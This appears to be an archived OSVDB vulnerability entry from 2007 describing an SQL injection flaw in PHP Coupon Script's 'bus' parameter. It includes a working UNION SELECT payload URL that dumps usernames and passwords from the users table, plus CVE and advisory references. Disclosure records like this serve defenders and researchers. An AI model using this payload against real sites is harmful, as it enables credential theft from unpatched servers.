PHP Coupon Script index.php viewbus Page bus Variable SQL Injection

2007-05-03T05:03:54
ID OSVDB:35590
Type osvdb
Reporter OSVDB
Modified 2007-05-03T05:03:54

Description

Manual Testing Notes

/index.php?page=viewbus&bus=-1//union//select//null,null,null,username,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null//from/*/users/

References:

Vendor URL: http://www.couponscript.com/ Secunia Advisory ID:25145 Other Advisory URL: http://milw0rm.com/exploits/3839 ISS X-Force ID: 34045 CVE-2007-2672 Bugtraq ID: 23799